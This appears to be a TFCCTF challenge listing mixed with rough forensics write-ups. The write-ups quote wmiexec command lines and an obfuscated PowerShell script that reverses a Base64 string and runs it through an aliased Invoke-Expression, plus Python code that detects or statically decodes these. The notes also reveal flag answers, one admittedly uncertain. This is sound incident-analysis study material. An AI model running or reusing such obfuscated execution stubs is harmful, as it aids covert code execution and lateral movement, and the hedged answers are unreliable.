CRYPTO
|
INSANE
minipif
In the aftermath, a few masterminds behind the operation managed to escape and have now relaunched their scheme. We've intercepted their encrypted communications, but we need your expertise to decrypt and decipher them.
flag
CRYPTO
|
HARD
minipif
We heard rumors that someone might rig the upcoming elections. We managed to place a backdoor in one of their messaging systems. See what you can make out of it, the world counts on you.
flag
REVERSE
|
EASY
header
There's a whole world left to explore.
Don't forget the flag format: TFCCTF{stringOfText}
flag
CRYPTO
|
WARMUP
hofill
CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC
CCCCC CCCCC CCCCC
flag
CRYPTO
|
EASY
hofill
Sequences... Sequences sequences... Sequences sequences sequences...
flag
MISC
|
EASY
hofill
Ahhh... the old flag-in-the-Discord challenge. The shenanigans are back, let's hope it goes well! Go to #bot-commands!
Flag format: TFCCTF{secret_message_in_the_discord}
flag
MISC
|
HARD
Hiumee
You got greedy and got stuck in a ruby mine. Find a way out
flag
CRYPTO
|
WARMUP
hofill
I just took a quick look at my DNA. I feel like I was created for this CTF.
CCCA CACG CAAT CAAT CCCA CACG CTGT ATAC CCTT CTCT ATAC CGTA CGTA CCTT CGCT ATAT CTCA CCTT CTCA CGGA ATAC CTAT CCTT ATCA CTAT CCTT ATCA CCTT CTCA ATCA CTCA CTCA ATAA ATAA CCTT CCCG ATAT CTAG CTGC CCTT CTAT ATAA ATAA CGTG CTTC
flag
PWN
|
EASY
Luma
Guard this cookie.
Note: If you successfully create a working exploit in the provided Docker, ensure you try the exploit multiple times on the remote system if any issues arise.
flag
FORENSICS
|
MEDIUM
Plig
After the attacker connected to our server, he managed to extract some random data, however encrypted. We trust you to decrypt it and get the flag.
TFCCTF{wmiexec_smb_127.0.0.1_admin$}
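Open it with Event Viewer.
We need to find the tool used to connect, the service it connected to, its IP address, and the shared resources folder.
I wanted to start from the shared folder.
It can be seen in the event details: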
SubjectUserSid S-1-5-21-4230534742-2542757381-3142984815-1111
SubjectUserName admmig
SubjectDomainName OFFSEC
SubjectLogonId 0x4da321f
ObjectType File
IpAddress 10.23.123.11
IpPort 47020
ShareName \\*\ADMIN$
ShareLocalPath \??\C:\Windows
AccessMask 0x1
AccessList %%4416
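IP 10.23.123.11
Folder ADMIN$
Service SMB
Tool PsExec
TFCCTF{psexec_smb_10.23.123.11_admin$} was wrong.
I later realized that the events are ordered with the earliest at the bottom, so I read from the bottom up.
Find the earliest file-share event and work slowly forward from it, and you can find: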
SubjectUserSid S-1-5-20
SubjectUserName SRVDEFENDER01$
SubjectDomainName OFFSEC
SubjectLogonId 0x3e4
NewProcessId 0xd44
NewProcessName C:\Windows\System32\cmd.exe
TokenElevationType %%1936
ProcessId 0xac8
CommandLine cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1
TargetUserSid S-1-0-0
TargetUserName admmig
TargetDomainName OFFSEC
TargetLogonId 0x4da32af
ParentProcessName C:\Windows\System32\wbem\WmiPrvSE.exe
MandatoryLabel S-1-16-12288
TFCCTF{cmd_wmiexec_10.23.123.11_admin$} I kept trying different values, but they were all wrong.
I could be basically sure that smb and admin$ were both correct.
# *** wmiexec.py
# parent is wmiprvse.exe
# examples:
# cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1
# cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1
TFCCTF{wmiexec_smb_127.0.0.1_admin$}
Probably; I don't remember the final answer.
https://wenku.csdn.net/answer/4m7p6bxn7x
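The wmiexec indicators in the notes above (WmiPrvSE.exe as parent, cmd.exe /Q /c with output redirected to \\127.0.0.1\ADMIN$\__<timestamp>) can be turned into a check over process-creation records. This is an added example, not part of the original notes; the function names and the dict layout are assumptions, the first sample record reuses the field values shown above, and the other two are constructed.

```python
import re

# wmiexec-style command line as quoted in the notes above:
#   cmd.exe /Q /c <command> 1> \\<host>\<share>\__<timestamp> 2>&1
WMIEXEC_CMDLINE = re.compile(
    r"^cmd\.exe\s+/Q\s+/c\s+(?P<command>.*?)\s+1>\s+"
    r"\\\\(?P<host>[^\\\s]+)\\(?P<share>[^\\\s]+)\\__(?P<stamp>\d+(?:\.\d+)?)\s+2>&1$",
    re.IGNORECASE,
)

def classify_process_creation(event):
    """Return a finding for a process-creation record that matches the
    wmiexec pattern (WmiPrvSE.exe parent + output redirected to a share)."""
    parent = event.get("ParentProcessName", "").lower()
    match = WMIEXEC_CMDLINE.match(event.get("CommandLine", "").strip())
    if match is None or not parent.endswith("\\wmiprvse.exe"):
        return None
    return {
        "tool": "wmiexec",
        "service": "smb",  # the output file is written to a UNC share
        "ip": match.group("host"),
        "share": match.group("share").lower(),
        "command": match.group("command"),
        "account": event.get("TargetUserName"),
    }

# Record 1 uses the field values shown in the notes; records 2 and 3 are constructed.
SAMPLE_EVENTS = [
    {"ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "TargetUserName": "admmig",
     "CommandLine": r"cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1"},
    {"ParentProcessName": r"C:\Windows\explorer.exe",
     "TargetUserName": "alice",
     "CommandLine": r"cmd.exe /c dir C:\Users 1> C:\Temp\out.txt 2>&1"},
    {"ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "TargetUserName": "alice",
     "CommandLine": r"cmd.exe /c ver"},
]

def scan(events):
    """Classify every record and keep only the matches."""
    return [f for f in map(classify_process_creation, events) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```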
CRYPTO
|
EASY
minipif
In the heart of an ancient, cursed forest lies the Phantom's lair, shrouded in hellfire. Legends speak of a powerful artifact hidden within, guarded by spectral flames and arcane riddles. Will you be the one to break the curse and uncover the secrets of the Hellfire Phantom?
Note: Challenge requires a bit of bruteforcing. Solver takes ~10 mins to run on my laptop.
Note: sha256sum of the variable secret's value is f8f099dd278c23d44387914def5fc20bc0fb8915d916775e5b4b17275e2107bd, website used is https://emn178.github.io/online-tools/sha256.html, input encoding UTF-8
Note: A person had issue with receiving multiple G points. The one that is used in the challenge ends in 727.
flag
REVERSE
|
WARMUP
Luma
I need to access this tool. Please help me with a license key!
flag
Running ltrace ./license shows the functions being used.
Rename the names in the decompiler.
PWN
|
HARD
Livian
Luma failed maths so I made him a PCI card that will help him do some calculations. Don't think you can exploit it because it only runs my signed firmware :3.
flag
PWN
|
MEDIUM
Mcsky23
Back 2 the chunks back 2 the muney back 2 the writes I don't listen 2 u when u corrupted cause u just talkin out of bytes You'll clear some certain bins just to see us overwrite...
flag
MISC
|
MEDIUM
Mcsky23
I have managed to maintain backdoor access to their server, but the police is lurking around. How can I evade their detection?
flag
PWN
|
INSANE
Mcsky23
I don't really like giving you print functions... but I can give you some guava juice... or some buava buice? Your choice!
flag
REVERSE
|
MEDIUM
Mcsky23
Knights wear armour, but does it protect them from dragons? Flag format: TFCCTF{sha256(password)}
flag
PWN
|
HARD
Mcsky23
100% super secure gaming without spyware or bugz! also idk who has applz??
flag
CRYPTO
|
MEDIUM
minipif
Welcome to Padgrounds, where every bit counts. Dive into the action and let your skills shine as you unravel the coded enigma.
Note: Make sure your solver works locally before running on remote.
flag
WEB
|
HARD
Mtib
You must be quick in order to catch the fish.
Note: Please wait 2-3 minutes for the instance to start. Also, make sure to carefully read the instructions on the main page.
flag
WEB
|
HARD
Mtib
I created this image sharing application. It's SUPER fast. But is it secure?
Note: Please wait 5-6 minutes for the instance to start.
flag
CRYPTO
|
MEDIUM
hofill
Are you ready to rotate your way to victory?
flag
WEB
|
MEDIUM
skyv3il
Our site has been breached. Since then we restricted the ips we can get Nones from. This should reduce our attack surface since no external input gets into our app. Is it safe ?
For the source code, go to /src.php
flag
MISC
|
MEDIUM
Hiumee
Santa doesn't have a lot of room left in his sleigh. Help him fit one more item
flag
MISC
|
EASY
Hiumee
Help us encrypt this message. You don't need to know it
flag
REVERSE
|
EASY
tomadimitrie
Can you catch the right signals for the flag? The flag length is 32 bytes (without the flag format). Flag format: TFCCTF{flag}
flag
MISC
|
HARD
Mtib
Can you bypass this state-of-the-art login system?
Note: The instance setup takes a bit longer, please wait 2-3 minutes after you start it.
flag
FORENSICS
|
EASY
Plig
An attacker managed to gain foothold in our network, but we managed to capture the connection to our server. Analyze the Challenge.evtx and identify the tool used to connect, the service it connected to, its IP address, and the shared resources folder. Flag format: TFCCTF{tool_service_ip_share} Example: TFCCTF{ntlmrelayx_rdp_192.168.0.1_logs$} Note: The flag is in all lowercase (except for TFCCTF).
TFCCTF{v1sual_b4s1c_a1nt_h4rd}
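I searched for a long time without any ideas.
Then I suddenly noticed this logger category.
While looking things up I had also seen the PowerShell log mentioned, but I didn't see it and gave up.
Then I suddenly found that it had been filtered out into its own view.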
$FBtFFDr8NXp5 = "=oQDiUGel5SYjF2YiASZslmR0V3TtASKpkiI90zZhFDbuJGc5MEZoVzQilnVIRWe5cUY6lTeMZTTINGMShUYigyZulmc0NFN2U2chJUbvJnR6oTX0JXZ252bD5SblR3c5N1WocmbpJHdTRXZH5COGRVV6oTXn5Wak92YuVkL0hXZU5SblR3c5N1WoASayVVLgQ3clVXclJlYldVLlt2b25WS" ;
$w9r4pBoZlnfIzH1keCtX = $FBtFFDr8NXp5.ToCharArray() ; [array]::Reverse($w9r4pBoZlnfIzH1keCtX) ; -join $w9r4pBoZlnfIzH1keCtX 2>&1> $null ;
$SCr = [SyStem.TexT.encODINg]::uTF8.GeTsTrInG([SYSteM.coNVErT]::froMBaSe64STrinG("$w9r4pBoZlnfIzH1keCtX")) ;
$uqR = "i"+"N"+"V"+"o"+"k"+"e"+"-"+"E"+"X"+"p"+"r"+"E"+"S"+"S"+"i"+"O"+"n" ; NEW-aLIaS -naME pWN -VaLuE $uqR -FORCe ; PWN $SCr ;
.\caca.exe "VHEEVH}x3uwcnad6u3eac3pvaj6tf"
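There are these 5 entries in total. Running them fails.
So decrypt VHEEVH}x3uwcnad6u3eac3pvaj6tf directly.
My guess was a shift.
Throwing it at a rot13 brute-force gives [A-Z]+2 TFCCTF}v3sualyb6s3cya3ntyh6rd
That failed.
Looking further down, there was also: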
ASCII[!-~]+2 TFCCTF{v1sual_b4s1c_a1nt_h4rd
TFCCTF{v1sual_b4s1c_a1nt_h4rd}
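The two decoding steps in the notes above can be done statically, without running the logged script: reverse the string and Base64-decode it to read the next stage, then brute-force a shift over printable ASCII for the caca.exe argument. This is an added example, not part of the original notes; the function names are assumptions, and the two input strings are copied from the log lines above.

```python
import base64
import re

# Copied from the logged script block above; decoded statically, never executed.
LOGGED = "=oQDiUGel5SYjF2YiASZslmR0V3TtASKpkiI90zZhFDbuJGc5MEZoVzQilnVIRWe5cUY6lTeMZTTINGMShUYigyZulmc0NFN2U2chJUbvJnR6oTX0JXZ252bD5SblR3c5N1WocmbpJHdTRXZH5COGRVV6oTXn5Wak92YuVkL0hXZU5SblR3c5N1WoASayVVLgQ3clVXclJlYldVLlt2b25WS"
ARGUMENT = "VHEEVH}x3uwcnad6u3eac3pvaj6tf"  # argument passed to caca.exe in the log

B64_CALL = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', re.IGNORECASE)

def decode_stage(obfuscated):
    """Undo the script's two layers: character reversal, then Base64 (UTF-8)."""
    return base64.b64decode(obfuscated[::-1], validate=True).decode("utf-8")

def nested_literals(script):
    """Decode every FromBase64String("...") literal embedded in a decoded stage."""
    return [base64.b64decode(literal, validate=True).decode("utf-8")
            for literal in B64_CALL.findall(script)]

def unshift(text, key, low=0x21, high=0x7E):
    """Move each character in low..high back by `key`, wrapping inside the range."""
    size = high - low + 1
    return "".join(
        chr((ord(c) - low - key) % size + low) if low <= ord(c) <= high else c
        for c in text
    )

def find_shift(text, known_prefix="TFCCTF{"):
    """Try every key over printable ASCII ('!'..'~') and keep those that
    produce the known flag prefix."""
    candidates = ((key, unshift(text, key)) for key in range(1, 94))
    return [(key, plain) for key, plain in candidates
            if plain.startswith(known_prefix)]

if __name__ == "__main__":
    stage = decode_stage(LOGGED)
    print(stage.strip())           # the command the obfuscated script would run
    print(nested_literals(stage))  # literal(s) hidden inside that command
    print(find_shift(ARGUMENT))    # shift key and recovered text
```

Shifting over letters only leaves `}`, the digits and `a` wrong, which is why only the full printable-ASCII range yields a well-formed flag.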
WEB
|
EASY
skyv3il
My friend wanted a site on which he could steal other people's photos. Can you break into it ?
flag
PWN
|
HARD
Luma
My teacher wanted me to create a game for the final school project. Hopefully I passed...
Note: This is a sequel to the 'virtual-rev' challenge. Solving the previous one isn't required, but be sure to solve it afterwards :)
flag
REVERSE
|
MEDIUM
Luma
I managed to break into a secret infrastructure, but it seems they use some weird language...
Note: This is a prequel to the pwn challenge "virtual". Make sure you check it out after solving this :)
flag
PWN
|
MEDIUM
Luma
I got tired of remembering my passwords... Password managers are so useful!
flag